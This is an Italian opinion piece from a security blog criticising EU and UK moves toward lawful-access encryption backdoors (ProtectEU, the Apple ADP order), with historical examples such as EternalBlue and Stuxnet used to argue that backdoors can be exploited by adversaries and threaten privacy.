Anche l’Europa, infatti, si muove. Lunedì scorso è stato presentato il piano ProtectEU– un documento che, tra le righe – scritte in burocratese – segna un altro punto di svolta. Sebbene l’UE abbia sempre espresso riserve sull’uso di backdoor nella crittografia, il piano parla chiaro: entro il 2025 verrà sviluppata una tabella di marcia per consentire un accesso legale ed efficace ai dati da parte delle forze dell’ordine, con una roadmap tecnologica prevista per l’anno successivo.

“Stiamo lavorando a una tabella di marcia ora e vedremo cosa è tecnicamente possibile”, ha affermato Henna Virkkunen, vicepresidente esecutivo della CE per la sovranità tecnologica, la sicurezza e la democrazia. “Il problema è che ora le nostre forze dell’ordine stanno perdendo terreno sui criminali perché i nostri investigatori di polizia non hanno accesso ai dati”, ha aggiunto e ha dettoche nell'”85 percento” le forze dell’ordine non riescono ad accedere ai dati di cui avrebbero bisogno. La proposta è di modificare l’attuale Cybersecurity Act per consentire queste modifiche.

Stesso tema si sta dibattendo nel Regno Unito, dopo che le autorità hanno chiesto ad Apple di creare una backdoor che consentisse l’accesso ai dati cloud crittografati degli utenti. Apple ha deciso di disattivare del tutto la funzionalità Advanced Data Protection (ADP) nel Regno Unito.

Le autorità britanniche avrebbero emesso un ordine chiedendo ad Apple di fornire l’accesso ai dati criptati degli utenti in tutto il mondo. Secondo la pubblicazione, l’ordine imponeva ad Apple di creare una backdoor che avrebbe consentito l’accesso a qualsiasi contenuto caricato sul cloud da qualsiasi utente.

In altre parole: si comincia a costruire l’infrastruttura legale e tecnica per aprire varchi nei sistemi di protezione dati. Varchi “legalizzati”, ma sempre varchi.

Tutto questo solleva una domanda scomoda: dove finisce la sicurezza e dove comincia il controllo?

Il rischio della backdoor e le sue derive

Nel tempo, la guerra informatica ha subito una profonda evoluzione, trasformandosi da strumento sperimentale a vero e proprio teatro operativo. Inizialmente, fu la NSA (National Security Agency) a detenere la leadership mondiale nelle capacità offensive cibernetiche, sviluppando strumenti avanzatissimi per penetrare e manipolare sistemi informatici ostili. Una delle conferme più clamorose di questa superiorità tecnica emerse nel 2017, con la pubblicazione di Vault-7 da parte di WikiLeaks: una serie di documenti top secret della CIA che rivelarono l’esistenza di un vasto arsenale di malware, exploit zero-day e tecniche di hacking sviluppate internamente dagli Stati Uniti per operazioni clandestine in tutto il mondo.

Ma anche prima di Vault-7, la potenza di fuoco della cyber intelligence americana era emersa in modo devastante. Il primo ransomware della storia a diffusione globale, WannaCry, si basava su un exploit chiamato EternalBlue, sottratto dai server della NSA dal gruppo hacker Shadow Brokers. EternalBlue sfruttava una vulnerabilità di Windows che l’NSA aveva individuato anni prima e mantenuto segreta, utilizzandola per accedere silenziosamente a qualsiasi sistema operativo Windows connesso in rete. Questo exploit rappresentava una vera e propria backdoor universale, e il fatto che sia stato rubato e poi usato (dagli hacker del gruppo Lazarus associati alla Corea Del Nord) contro il mondo intero ha dimostrato quanto sia sottile il confine tra arma strategica e boomerang incontrollabile.

Tra le più note operazioni militari cibernetiche nella storia, spicca Operation Olympic Games, una missione congiunta tra Stati Uniti e Israele. Il malware protagonista fu Stuxnet, uno strumento di guerra informatica mai visto prima, capace di sabotare fisicamente l’infrastruttura industriale della centrale nucleare iraniana di Natanz. Armato con quattro vulnerabilità zero-day (due contro Windows e due contro i PLC Siemens), Stuxnet rappresentò l’alba di una nuova era: quella in cui un malware può danneggiare impianti reali, senza sparare un colpo, ma alterando algoritmicamente la realtà.

Oggi, però, il dominio statunitense è stato ridimensionato.

La Cina, in particolare, ha dimostrato negli ultimi sei mesi di aver superato il livello tecnologico statunitense, con operazioni come Volt Typhoon, Salt Typhoon e Liminal Panda, condotte con precisione chirurgica e capacità stealth avanzate. In questo scenario di “guerra grigia“, dove le regole sono fluide e le frontiere invisibili, disporre di un accesso backdoor può offrire un vantaggio significativo nella raccolta d’intelligence.

Tuttavia, è cruciale ricordare che una backdoor, una volta scoperta, può essere usata anche dal nemico. La realtà del cyberspazio è fluida e imprevedibile: uno zero-day, in media, viene scoperto da altri ricercatori circa un anno dopo la sua prima individuazione. Questo significa che un exploit può essere utilizzato simultaneamente da più agenzie di intelligence, senza che l’una sappia dell’altra. In tale contesto, la backdoor non è sempre un vantaggio: può trasformarsi rapidamente in una vulnerabilità, in un’arma rivoltata contro chi l’ha forgiata.

Conclusioni

Come abbiamo visto, le backdoor, per loro natura, sono strumenti a doppio taglio. Non esiste una backdoor “solo per i buoni”: una volta creata, può essere sfruttata da chiunque riesca a trovarla. E soprattutto, apre un varco non solo nei dispositivi, ma in uno dei principi fondamentali degli esseri umani: il diritto alla riservatezza.

La verità è che ci stiamo pericolosamente avvicinando a quei modelli autoritari che per anni abbiamo criticato. Il confine tra sicurezza nazionale e sorveglianza di massa si fa sempre più sottile. E, paradossalmente, la difesa della libertà rischia di passare proprio per la sua negazione.

La politica vuole la backdoor. Ma il mondo – quello fatto di cittadini, esperti di sicurezza, attivisti per i diritti digitali e banalmente a persone estranee all’argomento – non la vuole. Perché una volta che apri una porta sul tuo mondo privato, è difficile richiuderla. E forse, a quel punto, non saremo più tanto diversi da quei regimi che oggi guardiamo con tanto disprezzo.

Il futuro si sta giocando oggi.

E dipende da noi decidere se vogliamo vivere in un mondo sicuro… o in un mondo sorvegliato.

L'articolo Le backdoor di stato stanno arrivando. Ma questa volta, con il timbro UE! proviene da il blog della sicurezza informatica.